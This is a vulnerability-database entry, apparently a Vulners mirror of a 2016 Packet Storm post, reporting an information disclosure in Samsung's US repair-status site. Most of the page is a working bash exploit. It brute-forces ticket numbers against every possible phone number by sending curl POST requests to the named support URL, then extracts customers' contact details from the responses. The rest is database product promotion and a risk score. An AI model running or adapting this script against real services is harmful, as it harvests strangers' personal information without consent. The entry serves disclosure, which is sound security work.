Lucene search
K

Samsung Repair Information Disclosure

🗓️ 11 Sep 2016 00:00:00Reported by Justa PersonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Samsung Repair Information Disclosure Bash Scrip

Code
`#!/bin/bash  
#  
for t in {4136987977..4136989977}; do  
echo "testing ticket $t"  
for i in {2000000000..9999999999}; do  
echo "testing telephone $i"  
p1=$(echo $i | cut --characters 1-3)  
p2=$(echo $i | cut --characters 4-6)  
p3=$(echo $i | cut --characters 7-)  
curl=$(curl -sS -d ticket_no=$t -d telephone1=$p1 -d telephone2=$p2 -d telephone3=$p3 http://support-us.samsung.com/cyber/repair_status_sta.jsp)  
if echo $curl | grep "Contact Information Start" > /dev/null  
then   
echo "found telephone $i for ticket $t"  
echo "***"  
echo $curl | sed -e 's/</\n</g' | grep value | sed -n '/name=\"act\"/,/enc_strtel_number/p' | sed -n '/id=/','//p'  
#echo $curl | w3m -dump -T text/html -cols=5000 | sed -n '/Repair Status/,/Picture of Issue/p'  
echo "***"  
break  
fi;  
done  
done  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2016 00:00Current
7.4High risk
Vulners AI Score7.4
26